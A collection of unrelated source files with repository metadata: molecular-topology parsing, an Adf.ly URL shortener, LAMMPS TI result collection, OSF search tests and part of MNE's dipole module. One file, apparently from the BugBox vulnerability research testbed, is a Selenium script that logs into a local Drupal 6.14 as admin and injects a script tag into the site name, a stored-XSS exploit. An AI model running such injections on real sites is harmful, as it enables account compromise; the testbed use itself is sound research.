# add dihedrals
match_generator = GraphSearch(DihedralAnglePattern([CriteriaSet()]))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
match.get_destination(3),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.dihedrals)
self.dihedrals = np.resize(self.dihedrals, (prev + len(tmp), 4))
self.dihedrals[-len(tmp):] = tmp
self.dihedrals[-len(tmp):] += offset
def _add_graph_impropers(self, molecular_graph, offset, atom_types, molecule):
# add improper dihedrals, only when center has three bonds
match_generator = GraphSearch(OutOfPlanePattern([CriteriaSet(
vertex_criteria={0: HasNumNeighbors(3)},
)], vertex_tags={1:1}))
tmp = sorted([(
match.get_destination(0),
match.get_destination(1),
match.get_destination(2),
match.get_destination(3),
) for match in match_generator(molecular_graph)])
new = len(tmp)
if new > 0:
prev = len(self.impropers)
self.impropers = np.resize(self.impropers, (prev + len(tmp), 4))
self.impropers[-len(tmp):] = tmp
self.impropers[-len(tmp):] += offset
def get_graph(self):
"""Return the bond graph represented by the data structure"""
return Graph(self.bonds)
def get_molecular_graph(self):
"""Return the molecular graph represented by the data structure"""
return MolecularGraph(self.bonds, self.numbers)
def get_groups(self):
"""Return a list of groups of atom indexes
Each atom in a group belongs to the same molecule or residue.
"""
groups = []
for a_index, m_index in enumerate(self.molecules):
if m_index >= len(groups):
groups.append([a_index])
else:
groups[m_index].append(a_index)
return groups
|
molmod/molmod
|
molmod/io/psf.py
|
Python
|
gpl-3.0
| 16,026
|
[
"CHARMM",
"CP2K"
] |
a57b1729037e39a20e7b1eb583cb2fac50bc120b44db19076214e9efb42a2382
|
# encoding: utf-8
"""
Adf.ly shortener implementation
Needs api key and uid
"""
from ..exceptions import ShorteningErrorException
from .base import BaseShortener
class Adfly(BaseShortener):
api_url = 'http://api.adf.ly/api.php'
def __init__(self, **kwargs):
if not all([kwargs.get('key', False), kwargs.get('uid', False)]):
raise TypeError('Please input the key and uid value')
self.key = kwargs.get('key')
self.uid = kwargs.get('uid')
self.type = kwargs.get('type', 'int')
super(Adfly, self).__init__(**kwargs)
def short(self, url):
data = {
'domain': 'adf.ly',
'advert_type': self.type, # int or banner
'key': self.key,
'uid': self.uid,
'url': url,
}
response = self._get(self.api_url, params=data)
if response.ok:
return response.text
raise ShorteningErrorException('There was an error shortening this '
'url - {0}'.format(response.content))
|
RuiNascimento/krepo
|
script.areswizard/pyshorteners/shorteners/adfly.py
|
Python
|
gpl-2.0
| 1,065
|
[
"ADF"
] |
b69ce741b714bf96c9efdb3e858730ebc32e0f3b75d97ec509b20298a9af1d13
|
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
# POC: http://www.exploit-db.com/exploits/18791/
class Exploit (framework.Exploit):
attributes = {'Name' : "DRUPAL_DP0001",
'Description' : "Drupal 5.20 and 6.14 (Core) XSS Vulnerabilities",
'References' : [],
'Target' : "Drupal 6.14",
'TargetLicense' : '',
'VulWikiPage' : "http://seamster.cs.umd.edu/vulwiki/index.php/Drupal_6.14",
'Type' : 'XSS',
'Privileged' : True
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
return
def exploit(self):
self.logger.info("Running Exploit()")
payload = "</title><script>alert(\'xss\');</script>"
driver = self.create_selenium_driver()
driver.get("http://localhost/drupal/")
self.logger.info("Page opened successfully: %s", driver.title)
driver.get_element(by_id="edit-name").send_keys("drupaladmin")
driver.get_element(by_id="edit-pass").send_keys("drupaladminpw21")
driver.get_element(by_id="edit-submit").click()
self.logger.info("Changing site name...")
driver.get("http://localhost/drupal/?q=admin/settings/site-information")
edit_name = driver.get_element(by_id="edit-site-name")
edit_name.clear()
edit_name.send_keys(payload)
driver.get_element(by_id="edit-submit").click()
self.logger.info("Payload sent")
self.logger.info("visit http://localhost/drupal/ to see XSS")
driver.cleanup()
return
def verify(self):
verified = False
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/drupal/")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
driver.cleanup()
return verified
|
UMD-SEAM/bugbox
|
framework/Exploits/DRUPAL_DP0001.py
|
Python
|
bsd-3-clause
| 2,325
|
[
"VisIt"
] |
3dde71de53c1cda88045152db392cd0a692235706938d4bdc60e6b2b96c0ca7c
|
# Author: Samuel Genheden samuel.genheden@gmail.com
"""
Program to collect TI results for a list of output
Examples:
collect_ti.py list
"""
import argparse
import os
import numpy as np
def _integrate(filename):
"""
Read a PMF from an Lammps output file and integrate it
"""
lines = []
with open(filename,"r") as f :
lines = f.readlines()
lines.append("0.0 1.0 0.0")
data = np.array([line.strip().split() for line in lines[2:]],dtype=float)
lam = data[:,1]
grad = data[:,2]
# Linear interpolation to lambda=1 from the last two lambda values simulated
grad[-1] = np.polyfit(lam[-3:-1],grad[-3:-1],1).sum()
return np.trapz(grad,x=lam)
if __name__ == '__main__':
argparser = argparse.ArgumentParser(description="Script to collect output and do TI")
argparser.add_argument('outlist', help="the output list")
argparser.add_argument('-outdir','--outdir',help="the directory with output files",default=".")
argparser.add_argument('--fulloutput',action="store_true",default=False,help="if the output the individual results")
argparser.add_argument('--prefix',help="the filename prefix")
argparser.add_argument('--postfix',help="the filename postfix")
args = argparser.parse_args()
if args.prefix is not None:
args.prefix = args.prefix+"-"
else:
args.prefix = ""
if args.postfix is not None:
args.postfix = "-"+args.postfix
else:
args.postfix = ""
filenames = [s.strip() for s in open(args.outlist,'r').readlines()]
for filename0 in filenames:
filename = os.path.join(args.outdir,
"out.dPotEngSS_%s%s%s"%(args.prefix,filename0,args.postfix))
dglist = [_integrate(filename)]
for repeat in range(2,11):
filename = os.path.join(args.outdir,"R%d"%repeat,
"out.dPotEngSS_%s%s%s"%(args.prefix,filename0,args.postfix))
try:
dg_repeat = _integrate(filename)
except:
nomore = True
else:
dglist.append(dg_repeat)
nomore = False
if nomore: break
print "%s"%(filename0),
if args.fulloutput :
print "\t"+"\t".join("%.3f"%(-dg*4.184) for dg in dglist),
if len(dglist) == 1:
dg = dglist[0]
std = 0.0
else:
dg = np.asarray(dglist).mean()
std = np.asarray(dglist).std()/np.sqrt(len(dglist))
print "\t%.3f\t%.3f"%(-dg*4.184,std*4.184)
|
SGenheden/Scripts
|
Lammps/collect_ti.py
|
Python
|
mit
| 2,550
|
[
"LAMMPS"
] |
db66b0434fe2b7d73439af4c5183fa90a772aa9be4ae22a97d681421fdd95371
|
# -*- coding: utf-8 -*-
import unittest
import logging
from nose.tools import * # flake8: noqa (PEP8 asserts)
from framework.auth.core import Auth
from website import settings
import website.search.search as search
from website.search import elastic_search
from website.search.util import build_query
from website.search_migration.migrate import migrate
from tests.base import OsfTestCase
from tests.test_features import requires_search
from tests.factories import (
UserFactory, ProjectFactory, NodeFactory,
UnregUserFactory, UnconfirmedUserFactory
)
TEST_INDEX = 'test'
@requires_search
class SearchTestCase(OsfTestCase):
def tearDown(self):
super(SearchTestCase, self).tearDown()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
def setUp(self):
super(SearchTestCase, self).setUp()
elastic_search.INDEX = TEST_INDEX
settings.ELASTIC_INDEX = TEST_INDEX
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
def query(term):
results = search.search(build_query(term), index=elastic_search.INDEX)
return results
def query_user(name):
term = 'category:user AND "{}"'.format(name)
return query(term)
@requires_search
class TestUserUpdate(SearchTestCase):
def setUp(self):
super(TestUserUpdate, self).setUp()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
self.user = UserFactory(fullname='David Bowie')
def test_new_user(self):
# Verify that user has been added to Elastic Search
docs = query_user(self.user.fullname)['results']
assert_equal(len(docs), 1)
def test_new_user_unconfirmed(self):
user = UnconfirmedUserFactory()
docs = query_user(user.fullname)['results']
assert_equal(len(docs), 0)
token = user.get_confirmation_token(user.username)
user.confirm_email(token)
user.save()
docs = query_user(user.fullname)['results']
assert_equal(len(docs), 1)
def test_change_name(self):
# Add a user, change her name, and verify that only the new name is
# found in search.
user = UserFactory(fullname='Barry Mitchell')
fullname_original = user.fullname
user.fullname = user.fullname[::-1]
user.save()
docs_original = query_user(fullname_original)['results']
assert_equal(len(docs_original), 0)
docs_current = query_user(user.fullname)['results']
assert_equal(len(docs_current), 1)
def test_disabled_user(self):
# Test that disabled users are not in search index
user = UserFactory(fullname='Bettie Page')
user.save()
# Ensure user is in search index
assert_equal(len(query_user(user.fullname)['results']), 1)
# Disable the user
user.is_disabled = True
user.save()
# Ensure user is not in search index
assert_equal(len(query_user(user.fullname)['results']), 0)
def test_merged_user(self):
user = UserFactory(fullname='Annie Lennox')
merged_user = UserFactory(fullname='Lisa Stansfield')
user.save()
merged_user.save()
assert_equal(len(query_user(user.fullname)['results']), 1)
assert_equal(len(query_user(merged_user.fullname)['results']), 1)
user.merge_user(merged_user)
assert_equal(len(query_user(user.fullname)['results']), 1)
assert_equal(len(query_user(merged_user.fullname)['results']), 0)
def test_employment(self):
user = UserFactory(fullname='Helga Finn')
user.save()
institution = 'Finn\'s Fine Filers'
docs = query_user(institution)['results']
assert_equal(len(docs), 0)
user.jobs.append({
'institution': institution,
'title': 'The Big Finn',
})
user.save()
docs = query_user(institution)['results']
assert_equal(len(docs), 1)
def test_education(self):
user = UserFactory(fullname='Henry Johnson')
user.save()
institution = 'Henry\'s Amazing School!!!'
docs = query_user(institution)['results']
assert_equal(len(docs), 0)
user.schools.append({
'institution': institution,
'degree': 'failed all classes',
})
user.save()
docs = query_user(institution)['results']
assert_equal(len(docs), 1)
def test_name_fields(self):
names = ['Bill Nye', 'William', 'the science guy', 'Sanford', 'the Great']
user = UserFactory(fullname=names[0])
user.given_name = names[1]
user.middle_names = names[2]
user.family_name = names[3]
user.suffix = names[4]
user.save()
docs = [query_user(name)['results'] for name in names]
assert_equal(sum(map(len, docs)), len(docs)) # 1 result each
assert_true(all([user._id == doc[0]['id'] for doc in docs]))
@requires_search
class TestProject(SearchTestCase):
def setUp(self):
super(TestProject, self).setUp()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
self.user = UserFactory(fullname='John Deacon')
self.project = ProjectFactory(title='Red Special', creator=self.user)
def test_new_project_private(self):
# Verify that a private project is not present in Elastic Search.
docs = query(self.project.title)['results']
assert_equal(len(docs), 0)
def test_make_public(self):
# Make project public, and verify that it is present in Elastic
# Search.
self.project.set_privacy('public')
docs = query(self.project.title)['results']
assert_equal(len(docs), 1)
@requires_search
class TestPublicNodes(SearchTestCase):
def setUp(self):
super(TestPublicNodes, self).setUp()
self.user = UserFactory(usename='Doug Bogie')
self.title = 'Red Special'
self.consolidate_auth = Auth(user=self.user)
self.project = ProjectFactory(
title=self.title,
creator=self.user,
is_public=True,
)
self.component = NodeFactory(
parent=self.project,
title=self.title,
creator=self.user,
is_public=True
)
self.registration = ProjectFactory(
title=self.title,
creator=self.user,
is_public=True,
is_registration=True
)
def test_make_private(self):
# Make project public, then private, and verify that it is not present
# in search.
self.project.set_privacy('private')
docs = query('category:project AND ' + self.title)['results']
assert_equal(len(docs), 0)
self.component.set_privacy('private')
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 0)
self.registration.set_privacy('private')
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 0)
def test_public_parent_title(self):
self.project.set_title('hello & world', self.consolidate_auth)
self.project.save()
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 1)
assert_equal(docs[0]['parent_title'], 'hello & world')
assert_true(docs[0]['parent_url'])
def test_make_parent_private(self):
# Make parent of component, public, then private, and verify that the
# component still appears but doesn't link to the parent in search.
self.project.set_privacy('private')
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 1)
assert_equal(docs[0]['parent_title'], '-- private project --')
assert_false(docs[0]['parent_url'])
def test_delete_project(self):
self.component.remove_node(self.consolidate_auth)
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 0)
self.project.remove_node(self.consolidate_auth)
docs = query('category:project AND ' + self.title)['results']
assert_equal(len(docs), 0)
def test_change_title(self):
title_original = self.project.title
self.project.set_title(
'Blue Ordinary', self.consolidate_auth, save=True)
docs = query('category:project AND ' + title_original)['results']
assert_equal(len(docs), 0)
docs = query('category:project AND ' + self.project.title)['results']
assert_equal(len(docs), 1)
def test_add_tags(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 0)
self.project.add_tag(tag, self.consolidate_auth, save=True)
for tag in tags:
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 1)
def test_remove_tag(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
self.project.add_tag(tag, self.consolidate_auth, save=True)
self.project.remove_tag(tag, self.consolidate_auth, save=True)
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 0)
def test_update_wiki(self):
"""Add text to a wiki page, then verify that project is found when
searching for wiki text.
"""
wiki_content = {
'home': 'Hammer to fall',
'swag': '#YOLO'
}
for key, value in wiki_content.items():
docs = query(value)['results']
assert_equal(len(docs), 0)
self.project.update_node_wiki(
key, value, self.consolidate_auth,
)
docs = query(value)['results']
assert_equal(len(docs), 1)
def test_clear_wiki(self):
# Add wiki text to page, then delete, then verify that project is not
# found when searching for wiki text.
wiki_content = 'Hammer to fall'
self.project.update_node_wiki(
'home', wiki_content, self.consolidate_auth,
)
self.project.update_node_wiki('home', '', self.consolidate_auth)
docs = query(wiki_content)['results']
assert_equal(len(docs), 0)
def test_add_contributor(self):
# Add a contributor, then verify that project is found when searching
# for contributor.
user2 = UserFactory(fullname='Adam Lambert')
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
self.project.add_contributor(user2, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 1)
def test_remove_contributor(self):
# Add and remove a contributor, then verify that project is not found
# when searching for contributor.
user2 = UserFactory(fullname='Brian May')
self.project.add_contributor(user2, save=True)
self.project.remove_contributor(user2, self.consolidate_auth)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
def test_hide_contributor(self):
user2 = UserFactory(fullname='Brian May')
self.project.add_contributor(user2)
self.project.set_visible(user2, False, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
self.project.set_visible(user2, True, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 1)
def test_wrong_order_search(self):
title_parts = self.title.split(' ')
title_parts.reverse()
title_search = ' '.join(title_parts)
docs = query(title_search)['results']
assert_equal(len(docs), 3)
def test_tag_aggregation(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
self.project.add_tag(tag, self.consolidate_auth, save=True)
docs = query(self.title)['tags']
assert len(docs) == 3
for doc in docs:
assert doc['key'] in tags
@requires_search
class TestAddContributor(SearchTestCase):
# Tests of the search.search_contributor method
def setUp(self):
super(TestAddContributor, self).setUp()
self.name1 = 'Roger1 Taylor1'
self.name2 = 'John2 Deacon2'
self.name3 = u'j\xc3\xb3ebert3 Smith3'
self.name4 = u'B\xc3\xb3bbert4 Jones4'
self.user = UserFactory(fullname=self.name1)
self.user3 = UserFactory(fullname=self.name3)
def test_unreg_users_dont_show_in_search(self):
unreg = UnregUserFactory()
contribs = search.search_contributor(unreg.fullname)
assert_equal(len(contribs['users']), 0)
def test_unreg_users_do_show_on_projects(self):
unreg = UnregUserFactory(fullname='Robert Paulson')
self.project = ProjectFactory(
title='Glamour Rock',
creator=unreg,
is_public=True,
)
results = query(unreg.fullname)['results']
assert_equal(len(results), 1)
def test_search_fullname(self):
# Searching for full name yields exactly one result.
contribs = search.search_contributor(self.name1)
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2)
assert_equal(len(contribs['users']), 0)
def test_search_firstname(self):
# Searching for first name yields exactly one result.
contribs = search.search_contributor(self.name1.split(' ')[0])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2.split(' ')[0])
assert_equal(len(contribs['users']), 0)
def test_search_partial(self):
# Searching for part of first name yields exactly one
# result.
contribs = search.search_contributor(self.name1.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name2.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 0)
def test_search_fullname_special_character(self):
# Searching for a fullname with a special character yields
# exactly one result.
contribs = search.search_contributor(self.name3)
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4)
assert_equal(len(contribs['users']), 0)
def test_search_firstname_special_charcter(self):
# Searching for a first name with a special character yields
# exactly one result.
contribs = search.search_contributor(self.name3.split(' ')[0])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4.split(' ')[0])
assert_equal(len(contribs['users']), 0)
def test_search_partial_special_character(self):
# Searching for a partial name with a special character yields
# exctly one result.
contribs = search.search_contributor(self.name3.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 1)
contribs = search.search_contributor(self.name4.split(' ')[0][:-1])
assert_equal(len(contribs['users']), 0)
@requires_search
class TestProjectSearchResults(SearchTestCase):
def setUp(self):
super(TestProjectSearchResults, self).setUp()
self.user = UserFactory(usename='Doug Bogie')
self.singular = 'Spanish Inquisition'
self.plural = 'Spanish Inquisitions'
self.possessive = 'Spanish\'s Inquisition'
self.project_singular = ProjectFactory(
title=self.singular,
creator=self.user,
is_public=True,
)
self.project_plural = ProjectFactory(
title=self.plural,
creator=self.user,
is_public=True,
)
self.project_possessive = ProjectFactory(
title=self.possessive,
creator=self.user,
is_public=True,
)
self.project_unrelated = ProjectFactory(
title='Cardinal Richelieu',
creator=self.user,
is_public=True,
)
def test_singular_query(self):
# Verify searching for singular term includes singular,
# possessive and plural versions in results.
results = query(self.singular)['results']
assert_equal(len(results), 3)
def test_plural_query(self):
# Verify searching for singular term includes singular,
# possessive and plural versions in results.
results = query(self.plural)['results']
assert_equal(len(results), 3)
def test_possessive_query(self):
# Verify searching for possessive term includes singular,
# possessive and plural versions in results.
results = query(self.possessive)['results']
assert_equal(len(results), 3)
class TestSearchExceptions(OsfTestCase):
# Verify that the correct exception is thrown when the connection is lost
@classmethod
def setUpClass(cls):
logging.getLogger('website.project.model').setLevel(logging.CRITICAL)
super(TestSearchExceptions, cls).setUpClass()
if settings.SEARCH_ENGINE == 'elastic':
cls._es = search.search_engine.es
search.search_engine.es = None
@classmethod
def tearDownClass(cls):
super(TestSearchExceptions, cls).tearDownClass()
if settings.SEARCH_ENGINE == 'elastic':
search.search_engine.es = cls._es
def test_connection_error(self):
# Ensures that saving projects/users doesn't break as a result of connection errors
self.user = UserFactory(usename='Doug Bogie')
self.project = ProjectFactory(
title="Tom Sawyer",
creator=self.user,
is_public=True,
)
self.user.save()
self.project.save()
class TestSearchMigration(SearchTestCase):
# Verify that the correct indices are created/deleted during migration
@classmethod
def tearDownClass(cls):
super(TestSearchMigration, cls).tearDownClass()
search.create_index(settings.ELASTIC_INDEX)
def setUp(self):
super(TestSearchMigration, self).setUp()
self.es = search.search_engine.es
search.delete_index(settings.ELASTIC_INDEX)
search.create_index(settings.ELASTIC_INDEX)
self.user = UserFactory(fullname='David Bowie')
self.project = ProjectFactory(
title=settings.ELASTIC_INDEX,
creator=self.user,
is_public=True
)
def test_first_migration_no_delete(self):
migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_multiple_migrations_no_delete(self):
for n in xrange(1, 21):
migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_first_migration_with_delete(self):
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)
def test_multiple_migrations_with_delete(self):
for n in xrange(1, 21, 2):
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
var = self.es.indices.get_aliases()
assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n + 1)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
assert not var.get(settings.ELASTIC_INDEX + '_v{}'.format(n))
|
barbour-em/osf.io
|
tests/test_elastic.py
|
Python
|
apache-2.0
| 20,719
|
[
"Brian"
] |
e94c96612ee44e694f26bc0c922d43d538b866bda31ad1cec59940488bc4fdc4
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import re
import numpy as np
from scipy import linalg
from .cov import read_cov, _get_whitener_data
from .io.constants import FIFF
from .io.pick import pick_types, channel_type
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import (_print_coord_trans, _coord_frame_name,
apply_trans, invert_transform, Transform)
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .externals.six import string_types
from .surface import (transform_surface_to, _normalize_vectors,
_get_ico_surface, _compute_nearest)
from .bem import _bem_find_surface, _bem_explain_surface
from .source_space import (_make_volume_source_space, SourceSpaces,
_points_outside_surface)
from .parallel import parallel_func
from .fixes import partial
from .utils import logger, verbose, _time_mask, warn, _check_fname, check_fname
class Dipole(object):
"""Dipole class for sequential dipole fits
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Used to store positions, orientations, amplitudes, times, goodness of fit
of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
or certain inverse solvers. Note that dipole position vectors are given in
the head coordinate frame.
Parameters
----------
times : array, shape (n_dipoles,)
The time instants at which each dipole was fitted (sec).
pos : array, shape (n_dipoles, 3)
The dipoles positions (m) in head coordinates.
amplitude : array, shape (n_dipoles,)
The amplitude of the dipoles (nAm).
ori : array, shape (n_dipoles, 3)
The dipole orientations (normalized to unit length).
gof : array, shape (n_dipoles,)
The goodness of fit.
name : str | None
Name of the dipole.
See Also
--------
read_dipole
DipoleFixed
Notes
-----
This class is for sequential dipole fits, where the position
changes as a function of time. For fixed dipole fits, where the
position is fixed as a function of time, use :class:`mne.DipoleFixed`.
"""
def __init__(self, times, pos, amplitude, ori, gof, name=None):
self.times = np.array(times)
self.pos = np.array(pos)
self.amplitude = np.array(amplitude)
self.ori = np.array(ori)
self.gof = np.array(gof)
self.name = name
def __repr__(self):
s = "n_times : %s" % len(self.times)
s += ", tmin : %s" % np.min(self.times)
s += ", tmax : %s" % np.max(self.times)
return "<Dipole | %s>" % s
def save(self, fname):
"""Save dipole in a .dip file
Parameters
----------
fname : str
The name of the .dip file.
"""
fmt = " %7.1f %7.1f %8.2f %8.2f %8.2f %8.3f %8.3f %8.3f %8.3f %6.1f"
# NB CoordinateSystem is hard-coded as Head here
with open(fname, 'wb') as fid:
fid.write('# CoordinateSystem "Head"\n'.encode('utf-8'))
fid.write('# begin end X (mm) Y (mm) Z (mm)'
' Q(nAm) Qx(nAm) Qy(nAm) Qz(nAm) g/%\n'
.encode('utf-8'))
t = self.times[:, np.newaxis] * 1000.
gof = self.gof[:, np.newaxis]
amp = 1e9 * self.amplitude[:, np.newaxis]
out = np.concatenate((t, t, self.pos / 1e-3, amp,
self.ori * amp, gof), axis=-1)
np.savetxt(fid, out, fmt=fmt)
if self.name is not None:
fid.write(('## Name "%s dipoles" Style "Dipoles"'
% self.name).encode('utf-8'))
def crop(self, tmin=None, tmax=None):
"""Crop data to a given time interval
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
"""
sfreq = None
if len(self.times) > 1:
sfreq = 1. / np.median(np.diff(self.times))
mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq)
for attr in ('times', 'pos', 'gof', 'amplitude', 'ori'):
setattr(self, attr, getattr(self, attr)[mask])
def copy(self):
"""Copy the Dipoles object
Returns
-------
dip : instance of Dipole
The copied dipole instance.
"""
return deepcopy(self)
@verbose
def plot_locations(self, trans, subject, subjects_dir=None,
bgcolor=(1, 1, 1), opacity=0.3,
brain_color=(1, 1, 0), fig_name=None,
fig_size=(600, 600), mode='cone',
scale_factor=0.1e-1, colors=None, verbose=None):
"""Plot dipole locations as arrows
Parameters
----------
trans : dict
The mri to head trans.
subject : str
The subject name corresponding to FreeSurfer environment
variable SUBJECT.
subjects_dir : None | str
The path to the freesurfer subjects reconstructions.
It corresponds to Freesurfer environment variable SUBJECTS_DIR.
The default is None.
bgcolor : tuple of length 3
Background color in 3D.
opacity : float in [0, 1]
Opacity of brain mesh.
brain_color : tuple of length 3
Brain color.
fig_name : tuple of length 2
Mayavi figure name.
fig_size : tuple of length 2
Mayavi figure size.
mode : str
Should be ``'cone'`` or ``'sphere'`` to specify how the
dipoles should be shown.
scale_factor : float
The scaling applied to amplitudes for the plot.
colors: list of colors | None
Color to plot with each dipole. If None defaults colors are used.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
fig : instance of mlab.Figure
The mayavi figure.
"""
from .viz import plot_dipole_locations
dipoles = []
for t in self.times:
dipoles.append(self.copy())
dipoles[-1].crop(t, t)
return plot_dipole_locations(
dipoles, trans, subject, subjects_dir, bgcolor, opacity,
brain_color, fig_name, fig_size, mode, scale_factor,
colors)
def plot_amplitudes(self, color='k', show=True):
"""Plot the dipole amplitudes as a function of time
Parameters
----------
color: matplotlib Color
Color to use for the trace.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
"""
from .viz import plot_dipole_amplitudes
return plot_dipole_amplitudes([self], [color], show)
def __getitem__(self, idx_slice):
"""Handle indexing"""
if isinstance(idx_slice, int): # make sure attributes stay 2d
idx_slice = [idx_slice]
selected_times = self.times[idx_slice].copy()
selected_pos = self.pos[idx_slice, :].copy()
selected_amplitude = self.amplitude[idx_slice].copy()
selected_ori = self.ori[idx_slice, :].copy()
selected_gof = self.gof[idx_slice].copy()
selected_name = self.name
new_dipole = Dipole(selected_times, selected_pos,
selected_amplitude, selected_ori,
selected_gof, selected_name)
return new_dipole
def __len__(self):
"""Handle len function"""
return self.pos.shape[0]
def _read_dipole_fixed(fname):
"""Helper to read a fixed dipole FIF file"""
logger.info('Reading %s ...' % fname)
_check_fname(fname, overwrite=True, must_exist=True)
info, nave, aspect_kind, first, last, comment, times, data = \
_read_evoked(fname)
return DipoleFixed(info, data, times, nave, aspect_kind, first, last,
comment)
class DipoleFixed(object):
"""Dipole class for fixed-position dipole fits
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Parameters
----------
info : instance of Info
The measurement info.
data : array, shape (n_channels, n_times)
The dipole data.
times : array, shape (n_times,)
The time points.
nave : int
Number of averages.
aspect_kind : int
The kind of data.
first : int
First sample.
last : int
Last sample.
comment : str
The dipole comment.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
read_dipole
Dipole
Notes
-----
This class is for fixed-position dipole fits, where the position
(and maybe orientation) is static over time. For sequential dipole fits,
where the position can change a function of time, use :class:`mne.Dipole`.
.. versionadded:: 0.12
"""
@verbose
def __init__(self, info, data, times, nave, aspect_kind, first, last,
comment, verbose=None):
self.info = info
self.nave = nave
self._aspect_kind = aspect_kind
self.kind = _aspect_rev.get(str(aspect_kind), 'Unknown')
self.first = first
self.last = last
self.comment = comment
self.times = times
self.data = data
self.verbose = verbose
@property
def ch_names(self):
return self.info['ch_names']
@verbose
def save(self, fname, verbose=None):
"""Save dipole in a .fif file
Parameters
----------
fname : str
The name of the .fif file. Must end with ``'.fif'`` or
``'.fif.gz'`` to make it explicit that the file contains
dipole information in FIF format.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
"""
check_fname(fname, 'DipoleFixed', ('-dip.fif', '-dip.fif.gz'),
('.fif', '.fif.gz'))
_write_evokeds(fname, self, check=False)
def plot(self, show=True):
"""Plot dipole data
Parameters
----------
show : bool
Call pyplot.show() at the end or not.
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure containing the time courses.
"""
return _plot_evoked(self, picks=None, exclude=(), unit=True, show=show,
ylim=None, xlim='tight', proj=False, hline=None,
units=None, scalings=None, titles=None, axes=None,
gfp=False, window_title=None, spatial_colors=False,
plot_type="butterfly", selectable=False)
# #############################################################################
# IO
@verbose
def read_dipole(fname, verbose=None):
"""Read .dip file from Neuromag/xfit or MNE
Parameters
----------
fname : str
The name of the .dip or .fif file.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
dipole : instance of Dipole or DipoleFixed
The dipole.
See Also
--------
mne.Dipole
mne.DipoleFixed
"""
_check_fname(fname, overwrite=True, must_exist=True)
if fname.endswith('.fif') or fname.endswith('.fif.gz'):
return _read_dipole_fixed(fname)
try:
data = np.loadtxt(fname, comments='%')
except:
